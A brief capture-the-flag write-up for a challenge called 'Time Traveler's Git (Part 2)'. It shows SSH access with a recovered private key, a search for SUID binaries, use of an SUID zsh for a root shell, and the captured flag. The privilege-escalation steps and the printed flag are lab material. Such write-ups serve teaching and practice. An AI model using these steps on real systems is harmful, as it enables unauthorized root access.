Time Traveler_s Git (Part 2)
Description
You are a time traveler who stumbled upon an ancient Git repository containing valuable data from a long-gone era. However, the repository seems to have some hidden secrets and potential vulnerabilities in its history.
143.110.180.89
Solution
This is the next part of Time Traveler's Git (Part 1)
Using the same
id_rsa
file we got from part 1, we can ssh into the server.Check for binaries with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
We find
/zsh
which is a binary that is not normally set with the SUID bit.Running the command:
/usr/bin/zsh
Gives us a root shell. You can confirm this by runningwhoami
Now, we can read the flag in the root directory.
cat /root/root.txt
Flag:
KPMG_CTF{27d67906ecd422971944f23c8afd3bd8}
Last updated